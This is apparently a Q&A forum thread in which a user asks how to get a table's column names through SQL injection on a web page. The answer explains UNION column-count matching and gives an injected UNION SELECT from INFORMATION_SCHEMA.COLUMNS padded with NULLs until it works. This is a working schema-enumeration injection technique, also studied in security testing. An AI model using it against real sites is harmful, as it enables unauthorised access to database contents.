# Unable to get column names of database

Tags: sql, sql-injection

I'm trying to get column names from a legacy system by using the following modified SQL statement:

```
 SELECT * 
 FROM drinks 
 WHERE drinkname='smirnoff' 
 UNION 
 SELECT COLUMN_NAME 
 FROM INFORMATION_SCHEMA.COLUMNS 
 WHERE TABLE_NAME = 'drinks'
```

But the webpage is throwing an error instead saying that it is failing to execute my modified query.

How would one go about getting the field names of the `drinks` table by sql injection?

Comment: `SELECT * . . . UNION SELECT COLUMN_NAME` just doesn't make sense.  Sample data and desired results would really help.

Comment: It is because I am trying to do a SQL Injection on a field within an offline backed up page

Comment: You can't union * with COLUMN_NAME because the # of columns doesn't match if * pulls more than the 1 column.

Comment: How many columns do you have in your drinks table?

Comment: Which part is the original SQL and which part is injected?

Comment: @jimmy8ball I dunno how many columns are in that table as I am trying to do an sql injection on the offline page

Answer (score 1):

In any UNION query, the number of columns must be the same in each SELECT that you combine with UNION. In other words, the following is an error, because the number of columns is not the same:

```
SELECT a, b, c FROM table1
UNION 
SELECT a, b FROM table1
```

When doing SQL injection, you might not know the number of columns in the select-list of the query you're exploiting. Add more columns with NULL as needed. Just keep trying until you get something that succeeds.

```
SELECT * FROM drinks WHERE drinkname='smirnoff' 
UNION 
SELECT COLUMN_NAME, NULL, NULL, NULL, ...
FROM INFORMATION_SCHEMA.COLUMNS 
WHERE TABLE_NAME = 'drinks'
```

This might seem tedious and error-prone.

But the criminals who perpetrate SQL injection attacks are pretty motivated.